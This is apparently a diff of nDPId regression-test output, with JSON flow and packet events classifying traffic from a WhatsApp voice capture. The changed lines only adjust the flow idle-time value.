+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":187,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1561455702981,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1561455702981,"pkt":"kLkxKPrKxiwDYGpkCABFAAA01H8AAC8Gs5ARqy9VwKgCDAG7xUbop23p2+r6qYARAEJXLQAAAQEICipMBbM0zcKk"} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1561455703144,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1561455703144,"pkt":"xiwDYGpkkLkxKPrKCABFAgBTAABAAEAGNu\/AqAIMEasvVcVGAbvb6vqp6KdtyoAYBACmYwAAAQEICjTOOFoqS5CDFQMDABoAAAAAAAAAAyfFNdvhqDfXGuNhDL9lpNkkKA=="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":197,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455704556,"flow_last_seen":1561455704556,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455704556,"l3_proto":"ip4","src_ip":"169.254.162.244","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1561455704556,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455704556,"pkt":"AQBef\/\/62DBiVgAcCABFAACa1ogAAP8Rp9yp\/qL07\/\/\/+sTQB2wAhsguTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"} 00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":197,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455704556,"flow_last_seen":1561455704556,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455704556,"l3_proto":"ip4","src_ip":"169.254.162.244","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
@@ -90,12 +90,12 @@ 00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":232,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455707435,"flow_last_seen":1561455707435,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1561455707435,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60549,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"pps.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":240,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1561455707470,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":117,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":117,"pkt_l4_len":83,"thread_ts_msec":1561455707470,"pkt":"kLkxKPrKxiwDYGpkCABFAABnIjoAAEAR0u7AqAIBwKgCDAA17IUAUyY\/fx+BgAABAAIAAAAAA3Bwcwh3aGF0c2FwcANuZXQAAAEAAcAMAAUAAQAACz4ADQZtbXgtZHMDY2RuwBDALgABAAEAAAA+AASd8BQ0"} 00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455707435,"flow_last_seen":1561455707470,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1561455707470,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60549,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"pps.whatsapp.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"157.240.20.52"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":241,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455707474,"flow_last_seen":1561455707474,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1561455707474,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.52","src_port":50504,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1561455707474,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1561455707474,"pkt":"xiwDYGpkkLkxKPrKCABFAABAAABAAEAGxd\/AqAIMnfAUNMVIAbt68MpNAAAAALDC\/\/823wAAAgQFtAEDAwcBAQgKNM5JcwAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1561455707511,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1561455707511,"pkt":"kLkxKPrKxiwDYGpkCABFAAA8AAAAAFMG8uOd8BQ0wKgCDAG7xUi7sKeEevDKTqASbHBlBQAAAgQFeAQCCAq1oF6CNM5JcwEDAwg="} 
-00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1561455707513,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1561455707513,"pkt":"xiwDYGpkkLkxKPrKCABFAAA0AABAAEAGxevAqAIMnfAUNMVIAbt68MpOu7CnhYAQBAb72QAAAQEICjTOSZq1oF6C"} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":251,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1561455707474,"flow_last_seen":1561455707524,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1561455707524,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.52","src_port":50504,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsApp","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pps.whatsapp.net","ja3":"7a7a639628f0fe5c7e057628a5bbec5a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00994{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1561455707474,"flow_last_seen":1561455707564,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1561455707564,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.52","src_port":50504,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsApp","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.3","client_requested_server_name":"pps.whatsapp.net","ja3":"7a7a639628f0fe5c7e057628a5bbec5a","ja3s":"475c9302dc42b2751db9edcac3b74891","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":241,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455707474,"flow_last_seen":1561455707474,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1561455707474,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.52","src_port":50504,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1561455707474,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1561455707474,"pkt":"xiwDYGpkkLkxKPrKCABFAABAAABAAEAGxd\/AqAIMnfAUNMVIAbt68MpNAAAAALDC\/\/823wAAAgQFtAEDAwcBAQgKNM5JcwAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1561455707511,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1561455707511,"pkt":"kLkxKPrKxiwDYGpkCABFAAA8AAAAAFMG8uOd8BQ0wKgCDAG7xUi7sKeEevDKTqASbHBlBQAAAgQFeAQCCAq1oF6CNM5JcwEDAwg="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1561455707513,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1561455707513,"pkt":"xiwDYGpkkLkxKPrKCABFAAA0AABAAEAGxevAqAIMnfAUNMVIAbt68MpOu7CnhYAQBAb72QAAAQEICjTOSZq1oF6C"} 
+00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":251,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1561455707474,"flow_last_seen":1561455707524,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1561455707524,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.52","src_port":50504,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsApp","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pps.whatsapp.net","ja3":"7a7a639628f0fe5c7e057628a5bbec5a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00994{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1561455707474,"flow_last_seen":1561455707564,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1561455707564,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.52","src_port":50504,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsApp","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.3","client_requested_server_name":"pps.whatsapp.net","ja3":"7a7a639628f0fe5c7e057628a5bbec5a","ja3s":"475c9302dc42b2751db9edcac3b74891","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1561455709888,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1561455709888,"pkt":"AQBeAAD7kLkxKPrKCABFAABNP9UAAP8R2BrAqAIM4AAA+xTpFOkAOUTGAAAAAAACAAAAAAAABV9yYW9wBF90Y3AFbG9jYWwAAAwAAQhfYWlycGxhecASAAwAAQ=="} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1561455709890,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":111,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":111,"pkt_l4_len":57,"thread_ts_msec":1561455709890,"pkt":"MzMAAAD7kLkxKPrKht1gDagnADkR\/\/6AAAAAAAAABBRAnYr9nwX\/AgAAAAAAAAAAAAAAAAD7FOkU6QA5e0MAAAAAAAIAAAAAAAAFX3Jhb3AEX3RjcAVsb2NhbAAADAABCF9haXJwbGF5wBIADAAB"} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1561455709984,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1561455709984,"pkt":"AQBef\/\/6kLkxKPrKCABFAACggMsAAAIRhNPAqAIM7\/\/\/+vzMB2wAjOY9TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpzZXJ2aWNlOldBTklQQ29ubmVjdGlvbjoxDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KTVg6IDMNCg0K"} 
@@ -119,9 +119,9 @@ 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":528,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1561455732919,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455732919,"pkt":"xiwDYGpkkLkxKPrKCABFAABIV+kAAEAREIzAqAIMATxOQNwI+xoANBvDAAEAGCESpELCs7YUVt8QVzF73yEACAAUMmINwHB46SKyj3xrODHnuD6GHSA="} 00690{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":632,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1561455705874,"flow_last_seen":1561455737893,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1561455737893,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}} 00699{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":633,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1561455705874,"flow_last_seen":1561455737895,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1561455737895,"l3_proto":"ip6","src_ip":"fe80::414:409d:8afd:9f05","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}} 
-00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":640,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455738163,"flow_last_seen":1561455738163,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1561455738163,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"169.254.162.244","src_port":49352,"dst_port":49159,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":640,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1561455738163,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1561455738163,"pkt":"2DBiVgAckLkxKPrKCABFAAAok2wAAP8GGLzAqAIMqf6i9MDIwAcC6LXACBPPY1AQCAWHOAAA"} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":641,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1561455738163,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1561455738163,"pkt":"kLkxKPrKxiwDYGpkCABFAAA0AAAAAP8GrByp\/qL0wKgCDMAHwMgIE89jAui1wYAQEABYwQAAAQEIChqjwVI0zNyh"} 
+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":640,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455738163,"flow_last_seen":1561455738163,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1561455738163,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"169.254.162.244","src_port":49352,"dst_port":49159,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":640,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1561455738163,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1561455738163,"pkt":"2DBiVgAckLkxKPrKCABFAAAok2wAAP8GGLzAqAIMqf6i9MDIwAcC6LXACBPPY1AQCAWHOAAA"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":641,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1561455738163,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1561455738163,"pkt":"kLkxKPrKxiwDYGpkCABFAAA0AAAAAP8GrByp\/qL0wKgCDMAHwMgIE89jAui1wYAQEABYwQAAAQEIChqjwVI0zNyh"} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":713,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455741430,"flow_last_seen":1561455741430,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455741430,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":50191,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00628{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":713,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1561455741430,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1561455741430,"pkt":"AQBef\/\/6kLkxKPrKCABFAAClZnoAAAIRnx\/AqAIM7\/\/\/+sQPB2wAke7DTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":713,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455741430,"flow_last_seen":1561455741430,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455741430,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":50191,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
@@ -133,10 +133,10 @@ 00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":716,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455741484,"flow_last_seen":1561455741484,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1561455741484,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"91.252.56.51","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.962659} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":726,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1561455742405,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1561455742405,"pkt":"xiwDYGpkkLkxKPrKCABFAAA4TCgAAEAB17nAqAIMW\/w4MwMDoOEAAAAARQAAZumbAAAxEUkIW\/w4M8CoAgx\/wNwIAFIAAA=="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":727,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1561455742405,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1561455742405,"pkt":"xiwDYGpkkLkxKPrKCABFAAA4HrIAAEABBTDAqAIMW\/w4MwMDoOEAAAAARQAAZp1RAAAxEZVSW\/w4M8CoAgx\/wNwIAFIAAA=="} 
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1561455688201,"flow_last_seen":1561455742310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6423,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"17.242.60.84","src_port":49354,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} -00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455738163,"flow_last_seen":1561455738163,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"169.254.162.244","src_port":49352,"dst_port":49159,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455738163,"flow_last_seen":1561455738163,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"169.254.162.244","src_port":49352,"dst_port":49159,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
